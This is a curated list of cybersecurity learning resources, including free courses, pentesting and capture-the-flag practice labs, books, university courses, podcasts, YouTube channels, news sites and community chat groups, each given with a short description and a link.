* **Chief Information Security Officer (CISO) Workshop Training** - The Chief Information Security Office (CISO) workshop contains a collection of security learnings, principles, and recommendations for modernizing security in your organization. This training workshop is a combination of experiences from Microsoft security teams and learnings from customers. - https://docs.microsoft.com/en-us/security/ciso-workshop/ciso-workshop
* **CLARK Center Plan C** - Free cybersecurity curriculum that is primarily video-based or provide online assignments that can be easily integrated into a virtual learning environments https://clark.center/home
* **Hack.me** is a FREE, community based project powered by eLearnSecurity. The community can build, host and share vulnerable web application code for educational and research purposes. It aims to be the largest collection of "runnable" vulnerable web applications, code samples and CMS's online. The platform is available without any restriction to any party interested in Web Application Security. https://hack.me/
* **Hacker101** - Free classes for web security - https://www.hacker101.com/
* **ElasticStack** - Free on-demand Elastic Stack, observability, and security courses. https://training.elastic.co/learn-from-home
* **Hoppers Roppers** - Community built around a series of free courses that provide training to beginners in the security field. https://www.hoppersroppers.org/training.html
* **IBM Security Learning Academy** Free technical training for IBM Security products. https://www.securitylearningacademy.com/
* **M.E. Kabay** Free industry courses and course materials for students, teachers and others are welcome to use for free courses and lectures. http://www.mekabay.com/courses/index.htm
* **Open P-TECH** Free digital learning on the tech skills of tomorrow. https://www.ptech.org/open-p-tech/
* **Udemy** - Online learning course platform "collection from the free courses in our learning marketplace" https://www.udemy.com/courses/free/
* **Enroll Now Free: PCAP Programming Essentials in Python** https://www.netacad.com/courses/programming/pcap-programming-essentials-python Python is the very versatile, object-oriented programming language used by startups and tech giants, Google, Facebook, Dropbox and IBM. Python is also recommended for aspiring young developers who are interested in pursuing careers in Security, Networking and Internet-of-Things. Once you complete this course, you are ready to take the PCAP – Certified Associate in Python programming. No prior knowledge of programming is required.
* **Packt Web Development Course** Web Development Get to grips with the fundamentals of the modern web Unlock one year of free online access. https://courses.packtpub.com/pages/free?fbclid=IwAR1FtKQcYK8ycCmBMXaBGvW_7SgPVDMKMaRVwXYcSbiwvMfp75gazxRZlzY
* **Stanford University Webinar - Hacked! Security Lessons from Big Name Breaches** 50 minute cyber lecture from Stanford.You Will Learn: -- The root cause of key breaches and how to prevent them; How to measure your organization’s external security posture; How the attacker lifecycle should influence the way you allocate resources https://www.youtube.com/watch?v=V9agUAz0DwI
* **Stanford University Webinar - Hash, Hack, Code: Emerging Trends in Cyber Security** Join Professor Dan Boneh as he shares new approaches to these emerging trends and dives deeper into how you can protect networks and prevent harmful viruses and threats. 50 minute cyber lecture from Stanford. https://www.youtube.com/watch?v=544rhbcDtc8
* **Kill Chain: The Cyber War on America's Elections (Documentary)** (Referenced at GRIMMCON), In advance of the 2020 Presidential Election, Kill Chain: The Cyber War on America’s Elections takes a deep dive into the weaknesses of today’s election technology, an issue that is little understood by the public or even lawmakers. https://www.hbo.com/documentaries/kill-chain-the-cyber-war-on-americas-elections
* **Intro to Cybersecurity Course** (15 hours) Learn how to protect your personal data and privacy online and in social media, and why more and more IT jobs require cybersecurity awareness and understanding. Receive a certificate of completion. https://www.netacad.com/portal/web/self-enroll/c/course-1003729
* **Cybersecurity Essentials** (30 hours) Foundational knowledge and essential skills for all cybersecurity domains, including info security, systems sec, network sec, ethics and laws, and defense and mitigation techniques used in protecting businesses. https://www.netacad.com/portal/web/self-enroll/c/course-1003733
* **Pluralsight and Microsoft** Partnership to help you become an expert in Azure. With skill assessments and over 200+ courses, 40+ Skill IQs and 8 Role IQs, you can focus your time on understanding your strengths and skill gaps and learn Azure as quickly as possible.https://www.pluralsight.com/partners/microsoft/azure
* **Blackhat Webcast Series** Monthly webcast of varying cyber topics. I will post specific ones in the training section below sometimes, but this is worth bookmarking and checking back. They always have top tier speakers on relevant, current topics. https://www.blackhat.com/html/webcast/webcast-home.html
* **Federal Virtual Training Environment** - US Govt sponsored free courses. There are 6 available, no login required. They are 101 Coding for the Public, 101 Critical Infrastructure Protection for the Public, Cryptocurrency for Law Enforcement for the Public, Cyber Supply Chain Risk Management for the Public, 101 Reverse Engineering for the Public, Fundamentals of Cyber Risk Management. https://fedvte.usalearning.gov/public_fedvte.php
* **Harrisburg University CyberSecurity** Collection of 18 curated talks. Scroll down to CYBER SECURITY section. You will see there are 4 categories Resource Sharing, Tools & Techniques, Red Team (Offensive Security) and Blue Teaming (Defensive Security). Lot of content in here; something for everyone. https://professionaled.harrisburgu.edu/online-content/
* **OnRamp 101-Level ICS Security Workshop** Starts this 4/28. 10 videos, Q&A / discussion, bonus audio, great links. Get up to speed fast on ICS security. It runs for 5 weeks. 2 videos per week. Then we keep it open for another 3 weeks for 8 in total. https://onramp-3.s4xevents.com
* **HackXOR WebApp CTF** Hackxor is a realistic web application hacking game, designed to help players of all abilities develop their skills. All the missions are based on real vulnerabilities I've personally found while doing pentests, bug bounty hunting, and research. https://hackxor.net/
* **Suricata Training** 5-part training module using a simulation as a backdrop to teach how to use Suricata. https://rangeforce.com/resource/suricata-challenge-reg/
* **flAWS System** Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS). Multiple levels, "Buckets" of fun. http://flaws.cloud/
* **Stanford CS 253 Web Security** A free course from Stanford providing a comprehensive overview of web security. The course begins with an introduction to the fundamentals of web security and proceeds to discuss the most common methods for web attacks and their countermeasures. The course includes video lectures, slides, and links to online reading assignments. https://web.stanford.edu/class/cs253
* **Linux Journey** A free, handy guide for learning Linux. Coverage begins with the fundamentals of command line navigation and basic text manipulation. It then extends to more advanced topics, such as file systems and networking. The site is well organized and includes many examples along with code snippets. Exercises and quizzes are provided as well. https://linuxjourney.com
* **Ryan's Tutorials** A collection of free, introductory tutorials on several technology topics including: Linux command line, Bash scripting, creating and styling webpages with HTML and CSS, counting and converting between different number systems, and writing regular expressions. https://ryanstutorials.net
* **The Ultimate List of SANS Cheat Sheets** Massive collection of free cybersecurity cheat sheets for quick reference (login with free SANS account required for some penetration testing resources). https://www.sans.org/blog/the-ultimate-list-of-sans-cheat-sheets/
* **CYBER INTELLIGENCE ANALYTICS AND OPERATIONS** Learn:The ins and outs of all stages of the intelligence cycle from collection to analysis from seasoned intel professionals. How to employ threat intelligence to conduct comprehensive defense strategies to mitigate potential compromise. How to use TI to respond to and minimize impact of cyber incidents. How to generate comprehensive and actionable reports to communicate gaps in defenses and intelligence findings to decision makers. https://www.shadowscape.io/cyber-intelligence-analytics-operat
* **Linux Command Line for Beginners** 25 hours of training - In this course, you’ll learn from one of Fullstack’s top instructors, Corey Greenwald, as he guides you through learning the basics of the command line through short, digestible video lectures. Then you’ll use Fullstack’s CyberLab platform to hone your new technical skills while working through a Capture the Flag game, a special kind of cybersecurity game designed to challenge participants to solve computer security problems by solving puzzles. Finally, through a list of carefully curated resources through a series of curated resources, we’ll introduce you to some important cybersecurity topics so that you can understand some of the common language, concepts and tools used in the industry. https://prep.fullstackacademy.com/
* **Hacking 101** 6 hours of free training - First, you'll take a tour of the world and watch videos of hackers in action across various platforms (including computers, smartphones, and the power grid). You may be shocked to learn what techniques the good guys are using to fight the bad guys (and which side is winning). Then you'll learn what it's like to work in this world, as we show you the different career paths open to you and the (significant) income you could make as a cybersecurity professional. https://cyber.fullstackacademy.com/prepare/hacking-101
* **Choose Your Own Cyber Adventure Series: Entry Level Cyber Jobs Explained** YouTube Playlist (videos from my channel #simplyCyber) This playlist is a collection of various roles within the information security field, mostly entry level, so folks can understand what different opportunities are out there. https://www.youtube.com/playlist?list=PL4Q-ttyNIRAqog96mt8C8lKWzTjW6f38F
* **NETINSTRUCT.COM** Free Cybersecurity, IT and Leadership Courses - Includes OS and networking basics. Critical to any Cyber job. https://netinstruct.com/courses
* **HackerSploit** - HackerSploit is the leading provider of free and open-source Infosec and cybersecurity training. https://hackersploit.org/
* **CyberStart America** - "A new program designed to give high school students in the US free access to cybersecurity learning resources written and developed by industry professionals, which can also be used to train and qualify for a National Cyber Scholarship." Sponsored by the SANS Institue and the National Cyber Scholarship Foundation, the program is open to high school students who are at least 13 years old and enrolled in 9th, 10th, 11th or 12th grade at a public or private school (or the homeschool equivalent) in the US. https://www.cyberstartamerica.org
* **Hacking Loops** This blog is designed to support the numerous colleagues, friends and acquaintances who have asked me for advice on how to transition from certain Information Technology (IT) roles into the IT Security world. https://www.hackingloops.com/metasploit-commands/
**PENTESTING TRAINING LABS** (curated from https://github.com/michelbernardods/labs-pentest)
* **Academy Hackaflag** (Spanish) https://academy.hackaflag.com.br/
* **Try Hack Me** https://tryhackme.com/
* **Attack-Defense** https://attackdefense.com/
* **alert to win** https://alf.nu/alert1
* **CTF Komodo Security** https://ctf.komodosec.com/
* **CMD Challenge** https://cmdchallenge.com
* **Explotation Education** https://exploit.education/
* **Google CTF** https://capturetheflag.withgoogle.com/
* **HackTheBox** https://www.hackthebox.eu
* **Hackthis** https://www.hackthis.co.uk
* **Hacksplaining** https://www.hacksplaining.com/exercises
* **Hacker101** https://ctf.hacker101.com
* **Hacker Security** https://capturetheflag.com.br/
* **Hacking-Lab** https://www.hacking-lab.com/index.html
* **ImmersiveLabs** https://immersivelabs.com/
* **Labs Wizard Security** https://labs.wizard-security.net
* **NewbieContest** https://www.newbiecontest.org/
* **OverTheWire** http://overthewire.org
* **Practical Pentest Labs** https://practicalpentestlabs.com
* **Pentestlab** https://pentesterlab.com/
* **Penetration Testing Practice Labs** http://www.amanhardikar.com/mindmaps/Practice.html
* **PentestIT LAB** https://lab.pentestit.ru
* **PicoCTF** https://picoctf.com
* **PWNABLE** https://pwnable.kr/play.php
* **Root-Me** https://www.root-me.org/
* **Root in Jail** http://ctf.rootinjail.com
* **Shellter** https://shellterlabs.com/pt/
* **SANS Challenger** https://www.holidayhackchallenge.com/
* **SmashTheStack** http://smashthestack.org/wargames.html
* **Try Hack Me** https://tryhackme.com/
* **The Cryptopals Crypto Challenges** https://cryptopals.com/
* **Vulnhub** https://www.vulnhub.com
* **W3Challs** https://w3challs.com/
* **WHO4REYOU** https://34.73.111.210
* **WeChall** http://www.wechall.net/
* **Zenk-Security** https://www.zenk-security.com/epreuves.php
## Books
* **Building Secure & Reliable Systems**
Best Practices for Designing, Implementing and Maintaining Systems (O'Reilly)
By Heather Adkins, Betsy Beyer, Paul Blankinship, Ana Oprea, Piotr Lewandowski, Adam Stubblefield
https://landing.google.com/sre/books/
* **Security Engineering** By Ross Anderson - A guide to building dependable distributed systems. (and Ross Anderson is brilliant //OP editorial) https://www.cl.cam.ac.uk/~rja14/book.html
* **The Cyber Skill Gap** By Vagner Nunes - The Cyber Skill Gap: How To Become A Highly Paid And Sought After Information Security Specialist! (Use COUPON CODE: W4VSPTW8G7 to make it free) https://payhip.com/b/PdkW
* **The Beginner’s Guide to Information Security** By Limor Elbaz - Offers insight and resources to help readers embark on a career in one of the 21st century’s most important—and potentially lucrative—fields. https://www.amazon.com/Beginners-Guide-Information-Security-Kickstart-ebook/dp/B01JTDDSAM
* **Texas A&M Security Courses** The web-based courses are designed to ensure that the privacy, reliability, and integrity of the information systems that power the global economy remain intact and secure. The web-based courses are offered through three discipline-specific tracks: general, non-technical computer users; technical IT professionals; and business managers and professionals. https://teex.org/program/dhs-cybersecurity/
## College Courses
* **Computer Science courses with video lectures** Intent of this list is to act as Online bookmarks/lookup table for freely available online video courses. Focus would be to keep the list concise so that it is easy to browse. It would be easier to skim through 15 page list, find the course and start learning than having to read 60 pages of text. If you are student or from non-CS background, please try few courses to decide for yourself as to which course suits your learning curve best. https://github.com/Developer-Y/cs-video-courses?utm_campaign=meetedgar&utm_medium=social&utm_source=meetedgar.com
* **Cryptography I** -offered by Stanford University - Rolling enrollment - Cryptography is an indispensable tool for protecting information in computer systems. In this course you will learn the inner workings of cryptographic systems and how to correctly use them in real-world applications. The course begins with a detailed discussion of how two parties who have a shared secret key can communicate securely when a powerful adversary eavesdrops and tampers with traffic. We will examine many deployed protocols and analyze mistakes in existing systems. The second half of the course discusses public-key techniques that let two parties generate a shared secret key. https://www.coursera.org/learn/crypto
* **Software Security** Rolling enrollment -offered by University of Maryland, College Park via Coursera - This course we will explore the foundations of software security. We will consider important software vulnerabilities and attacks that exploit them -- such as buffer overflows, SQL injection, and session hijacking -- and we will consider defenses that prevent or mitigate these attacks, including advanced testing and program analysis techniques. Importantly, we take a "build security in" mentality, considering techniques at each phase of the development cycle that can be used to strengthen the security of software systems. https://www.coursera.org/learn/software-security
* **Intro to Information Security** Georgia Institute of Technology via Udacity - Rolling Enrollment. This course provides a one-semester overview of information security. It is designed to help students with prior computer and programming knowledge — both undergraduate and graduate — understand this important priority in society today. Offered at Georgia Tech as CS 6035 https://www.udacity.com/course/intro-to-information-security--ud459
* **Cyber-Physical Systems Security** Georgia Institute of Technology via Udacity - This course provides an introduction to security issues relating to various cyber-physical systems including industrial control systems and those considered critical infrastructure systems. 16 week course - Offered at Georgia Tech as CS 8803 https://www.udacity.com/course/cyber-physical-systems-security--ud279
* **Finding Your Cybersecurity Career Path** - University of Washington via edX - 4 weeks long - self paced - In this course, you will focus on the pathways to cybersecurity career success. You will determine your own incoming skills, talent, and deep interests to apply toward a meaningful and informed exploration of 32 Digital Pathways of Cybersecurity.
https://www.edx.org/course/finding-your-cybersecurity-career-path
* **Building a Cybersecurity Toolkit** - University of Washington via edX - 4 weeks self-paced The purpose of this course is to give learners insight into these type of characteristics and skills needed for cybersecurity jobs and to provide a realistic outlook on what they really need to add to their “toolkits” – a set of skills that is constantly evolving, not all technical, but fundamentally rooted in problem-solving. https://www.edx.org/course/building-a-cybersecurity-toolkit
* **Cybersecurity: The CISO's View** - University of Washington via edX - 4 weeks long self-paced - This course delves into the role that the CISO plays in cybersecurity operations. Throughout the lessons, learners will explore answers to the following questions: How does cybersecurity work across industries? What is the professionals' point of view? How do we keep information secure https://www.edx.org/course/cybersecurity-the-cisos-view
* **Introduction to Cybersecurity** - University of Washington via edX - In this course, you will gain an overview of the cybersecurity landscape as well as national (USA) and international perspectives on the field. We will cover the legal environment that impacts cybersecurity as well as predominant threat actors. - https://www.edx.org/course/introduction-to-cybersecurity
* **Cyber Attack Countermeasures** New York University (NYU) via Coursera - This course introduces the basics of cyber defense starting with foundational models such as Bell-LaPadula and information flow frameworks. These underlying policy enforcements mechanisms help introduce basic functional protections, starting with authentication methods. Learners will be introduced to a series of different authentication solutions and protocols, including RSA SecureID and Kerberos, in the context of a canonical schema. - https://www.coursera.org/learn/cyber-attack-countermeasures
* **Introduction to Cyber Attacks** New York University (NYU) via Coursera - This course provides learners with a baseline understanding of common cyber security threats, vulnerabilities, and risks. An overview of how basic cyber attacks are constructed and applied to real systems is also included. Examples include simple Unix kernel hacks, Internet worms, and Trojan horses in software utilities. Network attacks such as distributed denial of service (DDOS) and botnet- attacks are also described and illustrated using real examples from the past couple of decades. https://www.coursera.org/learn/intro-cyber-attacks
* **Enterprise and Infrastructure Security** New York University (NYU) via Coursera - This course introduces a series of advanced and current topics in cyber security, many of which are especially relevant in modern enterprise and infrastructure settings. The basics of enterprise compliance frameworks are provided with introduction to NIST and PCI. Hybrid cloud architectures are shown to provide an opportunity to fix many of the security weaknesses in modern perimeter local area networks. https://www.coursera.org/learn/enterprise-infrastructure-security
* **Network Security** Georgia Institute of Technology via Udacity - This course provides an introduction to computer and network security. Students successfully completing this class will be able to evaluate works in academic and commercial security, and will have rudimentary skills in security research. The course begins with a tutorial of the basic elements of cryptography, cryptanalysis, and systems security, and continues by covering a number of seminal papers and monographs in a wide range of security areas. - https://www.udacity.com/course/network-security--ud199
* **Real-Time Cyber Threat Detection and Mitigation** - New York University (NYU) via Coursera This course introduces real-time cyber security techniques and methods in the context of the TCP/IP protocol suites. Explanation of some basic TCP/IP security hacks is used to introduce the need for network security solutions such as stateless and stateful firewalls. Learners will be introduced to the techniques used to design and configure firewall solutions such as packet filters and proxies to protect enterprise assets. https://www.coursera.org/learn/real-time-cyber-threat-detection
## Podcasts
* **Risky Business** Published weekly, the Risky Business podcast features news and in-depth commentary from security industry luminaries. Hosted by award-winning journalist Patrick Gray, Risky Business has become a must-listen digest for information security professionals. https://risky.biz/
* **Pauls Security Weekly** This show features interviews with folks in the security community; technical segments, which are just that, very technical; and security news, which is an open discussion forum for the hosts to express their opinions about the latest security headlines, breaches, new exploits and vulnerabilities, “not” politics, “cyber” policies and more. https://securityweekly.com/category-shows/paul-security-weekly/
* **Security Now** - Steve Gibson, the man who coined the term spyware and created the first anti-spyware program, creator of Spinrite and ShieldsUP, discusses the hot topics in security today with Leo Laporte. https://twit.tv/shows/security-now
* **Daily Information Security Podcast ("StormCast”)** Stormcasts are daily 5-10 minute information security threat updates. The podcast is produced each work day, and typically released late in the day to be ready for your morning commute. https://isc.sans.edu/podcast.html
* **ShadowTalk** Threat Intelligence Podcast by Digital Shadow_. The weekly podcast highlights key findings of primary-source research our Intelligence Team is conducting, along with guest speakers discussing the latest threat actors, campaigns, security events and industry news. https://resources.digitalshadows.com/threat-intelligence-podcast-shadowtalk
* **Don't Panic - The Unit 42 Podcast** Don't Panic! is the official podcast from Unit 42 at Palo Alto Networks. We find the big issues that are frustrating cyber security practitioners and help simplify them so they don't need to panic. https://unit42.libsyn.com/
* **Recorded Future** Recorded Future takes you inside the world of cyber threat intelligence. We’re sharing stories from the trenches and the operations floor as well as giving you the skinny on established and emerging adversaries. We also talk current events, technical tradecraft, and offer up insights on the big picture issues in our industry. https://www.recordedfuture.com/resources/podcast/
* **The Cybrary Podcast** Listen in to the Cybrary Podcast where we discuss a range topics from DevSecOps and Ransomware attacks to diversity and how to retain of talent. Entrepreneurs at all stages of their startup companies join us to share their stories and experience, including how to get funding, hiring the best talent, driving sales, and choosing where to base your business.
https://www.cybrary.it/info/cybrary-podcast/
* **Cyber Life** The Cyber Life podcast is for cyber security (InfoSec) professionals, people trying to break into the industry, or business owners looking to learn how to secure their data. We will talk about many things, like how to get jobs, cover breakdowns of hot topics, and have special guest interviews with the men and women "in the trenches" of the industry. https://redcircle.com/shows/cyber-life
* **Career Notes** Cybersecurity professionals share their personal career journeys and offer tips and advice in this brief, weekly podcast from The CyberWire. https://www.thecyberwire.com/podcasts/career-notes
_Below podcasts Added from here: https://infosec-conferences.com/cybersecurity-podcasts/_
* **Down the Security Rabbithole** http://podcast.wh1t3rabbit.net/ Down the Security Rabbithole is hosted by Rafal Los and James Jardine who discuss, by means of interviewing or news analysis, everything about Cybersecurity which includes Cybercrime, Cyber Law, Cyber Risk, Enterprise Risk & Security and many more. If you want to hear issues that are relevant to your organization, subscribe and tune-in to this podcast.
* **The Privacy, Security, & OSINT Show** https://podcasts.apple.com/us/podcast/the-privacy-security-osint-show/id1165843330 The Privacy, Security, & OSINT Show, hosted by Michael Bazzell, is your weekly dose of digital security, privacy, and Open Source Intelligence (OSINT) opinion and news. This podcast will help listeners learn some ideas on how to stay secure from cyber-attacks and help them become “digitally invisible”.
* **Defensive Security Podcast** https://defensivesecurity.org/ Hosted by Andrew Kalat (@lerg) and Jerry Bell (@maliciouslink), the Defensive Security Podcasts aims to look/discuss the latest security news happening around the world and pick out the lessons that can be applied to keeping organizations secured. As of today, they have more than 200 episodes and some of the topics discussed include Forensics, Penetration Testing, Incident Response, Malware Analysis, Vulnerabilities and many more.
* **Darknet Diaries** https://darknetdiaries.com/episode/ Darknet Diaries Podcast is hosted and produced by Jack Rhysider that discuss topics related to information security. It also features some true stories from hackers who attacked or have been attacked. If you’re a fan of the show, you might consider buying some of their souvenirs here (https://shop.darknetdiaries.com/).
* **Brakeing Down Security** https://www.brakeingsecurity.com/ Brakeing Down Security started in 2014 and is hosted by Bryan Brake, Brian Boettcher, and Amanda Berlin. This podcast discusses everything about the Cybersecurity world, Compliance, Privacy, and Regulatory issues that arise in today’s organizations. The hosts will teach concepts that Information Security Professionals need to know and discuss topics that will refresh the memories of seasoned veterans.
* **Open Source Security Podcast** https://www.opensourcesecuritypodcast.com/ Open Source Security Podcast is a podcast that discusses security with an open-source slant. The show started in 2016 and is hosted by Josh Bressers and Kurt Siefried. As of this writing, they now posted around 190+ podcasts
* **Cyber Motherboard** https://podcasts.apple.com/us/podcast/cyber/id1441708044 Ben Makuch is the host of the podcast CYBER and weekly talks to Motherboard reporters Lorenzo Franceschi-Bicchierai and Joseph Cox. They tackle topics about famous hackers and researchers about the biggest news in cybersecurity. The Cyber- stuff gets complicated really fast, but Motherboard spends its time fixed in the infosec world so we don’t have to.
* **Hak5** https://shop.hak5.org/pages/videos Hak5 is a brand that is created by a group of security professionals, hardcore gamers and “IT ninjas”. Their podcast, which is mostly uploaded on YouTube discusses everything from open-source software to penetration testing and network infrastructure. Their channel currently has 590,000 subscribers and is one of the most viewed shows when you want to learn something about security networks.
* **Threatpost Podcast Series** https://threatpost.com/category/podcasts/ Threatpost is an independent news site which is a leading source of information about IT and business security for hundreds of thousands of professionals worldwide. With an award-winning editorial team produces unique and high-impact content including security news, videos, feature reports and more, with their global editorial activities are driven by industry-leading journalist Tom Spring, editor-in-chief.
* **CISO-Security Vendor Relationship Podcast** https://cisoseries.com Co-hosted by the creator of the CISO/Security Vendor Relationship Series, David Spark, and Mike Johnson, in 30 minutes, this weekly program challenges the co-hosts, guests, and listeners to critique, share true stories. This podcast, The CISO/Security Vendor Relationship, targets to enlighten and educate listeners on improving security buyer and seller relationships.
* **Getting Into Infosec Podcast** Stories of how Infosec and Cybersecurity pros got jobs in the field so you can be inspired, motivated, and educated on your journey. - https://gettingintoinfosec.com/
* **Unsupervised Learning** Weekly podcasts and biweekly newsletters as a curated summary intersection of security, technology, and humans, or a standalone idea to provoke thought, by Daniel Miessler. https://danielmiessler.com/podcast/
## Cybersecurity YouTube Channels
_This list was originally forked/curated from here: https://wportal.xyz/collection/cybersec-yt1 on (7/29/2020) Attribution and appreciation to d4rckh_
* **SimplyCyber** Weekly vids, Simply Cyber brings Information security related content to help IT or Information Security professionals take their career further, faster. Current cyber security industry topics and techniques are explored to promote a career in the field. Topics cover offense, defense, governance, risk, compliance, privacy, education, certification, conferences; all with the intent of professional development. https://www.youtube.com/c/GeraldAuger
* **IPPSec** https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA
* **Tradecraft Security Weekly** - Want to learn about all of the latest security tools and techniques?
https://wiki.securityweekly.com/Tradecraft_Security_Weekly
* **Derek Rook** - CTF/Boot2root/wargames Walkthrough - lots of lengthy screenshot instructional vids https://www.youtube.com/channel/UCMACXuWd2w6_IEGog744UaA
* **Adrian Crenshaw** - lots of lengthy con-style talks https://www.youtube.com/user/irongeek
* **LionSec** - lots of brief screenshot instructional vids, no dialog https://www.youtube.com/channel/UCCQLBOt_hbGE-b9I696VRow
* **Zer0Mem0ry** - lots of brief c++ security videos, programming intensive
https://www.youtube.com/channel/UCDk155eaoariJF2Dn2j5WKA
* **webpwnized** - lots of brief screenshot vids, some CTF walkthroughs https://www.youtube.com/channel/UCPeJcqbi8v46Adk59plaaXg
* **Waleed Jutt** - lots of brief screenshot vids covering web security and game programming https://www.youtube.com/channel/UCeN7cOELsyMHrzfMsJUgv3Q
* **Troy Hunt** - lone youtuber, medium length news videos, 16K followers, regular content https://www.youtube.com/channel/UCD6MWz4A61JaeGrvyoYl-rQ
* **Tradecraft Security Weekly** - Want to learn about all of the latest security tools and techniques?https://wiki.securityweekly.com/Tradecraft_Security_Weekly
* **SSTec Tutorials** - lots of brief screenshot vids, regular updates https://www.youtube.com/channel/UCHvUTfxL_9bNQgqzekPWHtg
* **Shozab Haxor** - lots of screenshot style instructional vids, regular updates, windows CLI tutorial https://www.youtube.com/channel/UCBwub2kRoercWQJ2mw82h3A
* **Seytonic** - variety of DIY hacking tutorials, hardware hacks, regular updates https://www.youtube.com/channel/UCW6xlqxSY3gGur4PkGPEUeA
* **Security Weekly** - regular updates, lengthy podcast-style interviews with industry pros https://www.youtube.com/channel/UCg--XBjJ50a9tUhTKXVPiqg
* **SecureNinjaTV** - brief news bites, irregular posting, 18K followers https://www.youtube.com/channel/UCNxfV4yR0nIlhFmfwcdf3BQ
* **Samy Kamkar’s Applied hacking** https://www.youtube.com/user/s4myk
* **rwbnetsec** - lots of medium length instructional videos covering tools from Kali 2.0, no recent posts. https://www.youtube.com/channel/UCAJ8Clc3188ek9T_5XTVzZQ
* **Penetration Testing in Linux** https://www.youtube.com/channel/UC286ntgASMskhPIJQebJVvA
* **Pentester Academy TV** - lots of brief videos, very regular posting, up to +8 a week https://www.youtube.com/channel/UChjC1q6Ami7W0E71TzPZELA
* **Open SecurityTraining** - lots of lengthy lecture-style vids, no recent posts, but quality info. https://www.youtube.com/channel/UCthV50MozQIfawL9a_g5rdg
* **NetSecNow** - channel of pentesteruniversity.org, seems to post once a month, screenshot instructional vids
https://www.youtube.com/channel/UC6J_GnSAi7F2hY4RmnMcWJw
* **Metasploitation** - lots of screenshot vids, little to no dialogue, all about using Metasploit, no recent vids. https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZrg
* **LiveOverflow** - Lots of brief-to-medium instructional vids, covering things like buffer overflows and exploit writing, regular posts. https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w
* **LionSec** - lots of brief screenshot instructional vids, no dialog https://www.youtube.com/channel/UCCQLBOt_hbGE-b9I696VRow
* **Latest Hacking News** 10K followers, medium length screenshot videos, no recent releases https://www.youtube.com/user/thefieldhouse/feed
* **John Hammond** - Solves CTF problems. contains penTesting tips and tricks https://www.youtube.com/user/RootOfTheNull
* **JackkTutorials** - lots of medium length instructional vids with some AskMe vids from the youtuber https://www.youtube.com/channel/UC64x_rKHxY113KMWmprLBPA
* **iExplo1t** - lots of screenshot vids aimed at novices, 5.7K Followers, no recent posts https://www.youtube.com/channel/UCx0HClQ_cv0sLNOVhoO2nxg/videos
* **HACKING TUTORIALS** - handful of brief screenshot vids, no recent posts. https://www.youtube.com/channel/UCbsn2kQwNxcIzHwbdDjzehA
* **HackerSploit** - regular posts, medium length screenshot vids, with dialog https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q
* **GynvaelEN** - Security streams from Google Researcher. Mainly about CTFs, computer security, programing and similar things. https://www.youtube.com/channel/UCCkVMojdBWS-JtH7TliWkVg
* **Geeks Fort** - KIF - lots of brief screenshot vids, no recent posts https://www.youtube.com/channel/UC09NdTL2hkThGLSab8chJMw
* **Error 404 Cyber News** - short screen-shot videos with loud metal, no dialog, bi-weekly https://www.youtube.com/channel/UC4HcNHFKshqj-aeyi6imW7Q
* **Don Does 30** - amateur pen-tester posting lots of brief screenshot vids regularly, 9K Followers https://www.youtube.com/channel/UCarxjDjSYsIf50Jm73V1D7g
* **Derek Rook** - CTF/Boot2root/wargames Walkthrough - lots of lengthy screenshot instructional vids, https://www.youtube.com/channel/UCMACXuWd2w6_IEGog744UaA
* **DemmSec** - lots of pen testing vids, somewhat irregular uploads, 44K followers https://www.youtube.com/channel/UCJItQmwUrcW4VdUqWaRUNIg
* **DEFCON Conference** - lots of lengthy con-style vids from the iconical DEFCON https://www.youtube.com/channel/UC6Om9kAkl32dWlDSNlDS9Iw
* **DedSec** - lots of brief screenshot how-to vids based in Kali, no recent posts. https://www.youtube.com/channel/UCx34ZZW2KgezfUPPeL6m8Dw
* **danooct1** - lots of brief screenshot, how-to vids regarding malware, regular content updates, 186K followers https://www.youtube.com/channel/UCqbkm47qBxDj-P3lI9voIAw
* **BalCCon** - Balkan Computer Congress - Long con-style talks from the Balkan Computer Congress, doesn’t update regularlyhttps://www.youtube.com/channel/UCoHypmu8rxlB5Axh5JxFZsA
* **Corey Nachreiner** - security newsbites, 2.7K subscribers, 2-3 videos a week, no set schedule https://www.youtube.com/channel/UC7dUL0FbVPGqzdb2HtWw3Xg
* **Adrian Crenshaw** - lots of lengthy con-style talks https://www.youtube.com/user/irongeek
* **0x41414141** - Channel with couple challenges, well explained https://www.youtube.com/channel/UCPqes566OZ3G_fjxL6BngRQ
* **HackADay** - Hackaday serves up Fresh Hacks Every Day from around the Internet. https://hackaday.com/
* **TheCyberMentor** - Heath Adams uploads regular videos related to various facets of cyber security, from bug bounty hunts to specific pentest methodologies like API, buffer overflows, networking. https://www.youtube.com/c/TheCyberMentor/
* **Grant Collins** - Grant uploads videos regarding breaking into cybersecurity, various cybersecurity projects, building up a home lab amongst many others. Also has a companion discord channel and a resource website. https://www.youtube.com/channel/UCTLUi3oc1-a7dS-2-YgEKmA/featured
## News
* **Krebs On Security** In depth security news and investigation https://krebsonsecurity.com/
* **Dark Reading** Cyber security's comprehensive news site is now an online community for security professionals. https://www.darkreading.com/
* **The Hacker News** - The Hacker News (THN) is a leading, trusted, widely-acknowledged dedicated cybersecurity news platform, attracting over 8 million monthly readers including IT professionals, researchers, hackers, technologists, and enthusiasts. https://thehackernews.com
* **SecuriTeam** - A free and independent source of vulnerability information. https://securiteam.com/
* **SANS NewsBites** - "A semiweekly high-level executive summary of the most important news articles that have been published on computer security during the last week. Each news item is very briefly summarized and includes a reference on the web for detailed information, if possible." Published for free on Tuesdays and Fridays. https://www.sans.org/newsletters/newsbites
## Professional Networking
### Discord and Slack (Networking and Communication Opportunities)
_I'm (Gerald Auger) personally a member of the following Discord/Slack groups and have validated their quality and integrity. Message me if you want in those channels Discord: Gerald.Auger | Slack Gerald_Auger_
* **Metasploit Official Public** Slack https://metasploit.com/slack
* **BlackHills Information Security Discord** https://discord.gg/FWykjNy
* **The Cyber Mentor** Discord https://discord.com/invite/REfpPJB
* **DERPCON** Discord - https://discord.gg/invite/859Zvrm
* **InfoSecJobs** Discord https://invite.infosecjobs.xyz/
* **GRIMM Con - Public** Discord https://discord.gg/bDdgyaV
_The follow channels I'm not a member of and cuarted but have not validated their quality and integrity personally. If you are a member and can message me about these groups I will move them into a validated category_
* **OWASP** (Slack) The Open Web Application Security Project (OWASP) is an online community that produces freely-available articles, methodologies, documentation, tools, and technologies in the field of web application security. https://owasp.slack.com/
